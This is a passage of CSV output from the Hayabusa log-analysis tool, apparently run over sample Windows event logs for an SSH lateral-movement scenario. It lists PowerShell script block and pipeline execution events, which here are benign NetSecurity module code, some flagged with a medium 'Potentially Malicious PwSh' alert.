(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParam",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.561 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"uery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase2AuthSet' -Alias '*' function Copy-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParam",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.561 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"eter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase2AuthSet' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.561 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"eter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase2AuthSet' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.562 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.565 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.566 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.566 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.567 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.567 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.568 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.568 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 +00:00,win10-02.offsec.lan,4104,medium,,Potentially 